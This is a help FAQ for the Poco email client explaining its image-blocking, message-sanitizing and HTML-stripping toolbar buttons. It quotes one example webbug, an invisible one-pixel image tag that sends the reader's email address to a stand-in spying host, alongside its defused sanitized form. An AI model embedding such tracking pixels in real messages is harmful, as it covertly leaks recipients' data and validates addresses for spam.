Poco Reading FAQ - Secure Display of HTML Messages

Q: How can I view HTML messages without all the security risks (such as webbugs)?
In Poco 3, there are a couple of new features related to HTML display. Take a look at the small toolbar above the preview pane. Among the other icons, there are three of note:

If you don't see these buttons, you may have turned them off. To turn them on, right-click in the small toolbar and select Show Security Control.

Before explaining how the buttons differ, here's what they all have in common: If any of the three security features is active (the button will show a dark background when using the default colors), no images will be fetched from external sources on the Internet.

Here's what each button does, in order from left to right:

Tri-color button : "Toggle image downloading," same as Poco 2's "Download external images" button.
This stops Poco from retrieving external images when you open an HTML message. This option is useful for preventing spam from verifying your address via webbugs, for example.

Note: If an image is already in the cache from a previous fetch, it will still appear if only Toggle Image Downloading is disabled.

Tri-color button with black censorship boxes : Sanitize Message.
"Sanitize Message" does much more than merely avoid the downloading of an image. It takes all the suspicious Javascript, webbugs, background sounds and image HTML tags, etc., and mangles the possibly-malicious script and external references.

Instead of saying something like:

<img height=1 width=1 src=http://WeAreSpyingOnYou.com?PersonalData=YourEmailAddress>
A Poco3-sanitized webbug will say something like the following (emphasis added):
<sanitized_img height=1 width=1 sanitized_src=http://WeAreSpyingOnYou.com?PersonalData=YourEmailAddress>

This mangling means the HTML command is not executed, so the external data is not requested. The effect is display-only; the email is itself not changed.

The idea is to increase security and privacy. Spammers use webbugs and regular external images as a form of return-receipt: when you read the email, the image is fetched and your email address is validated. This can leave you open to a lot more spam.

Since it's a toggle, you can easily enable it for a particular email if you trust the source.

Meanwhile, "Download External Images" (new form: "Toggle Image Downloading") simply enables or disables the fetching of external images only. The content of the email is not changed even for display. A placeholder the size of the original picture appears in the email with a black exclamation mark on a yellow background, indicating that downloading is disabled. This placeholder won't appear if "Sanitize Message" is enabled.

With image downloading disabled, a newsletter will have a lot of frames with black-on-yellow exclamation-mark placeholders, but the form of the newsletter will be preserved. A sanitized newsletter will look quite different.

Gray envelope icon : Strip HTML.
This will basically turn an HTML message into a plaintext message.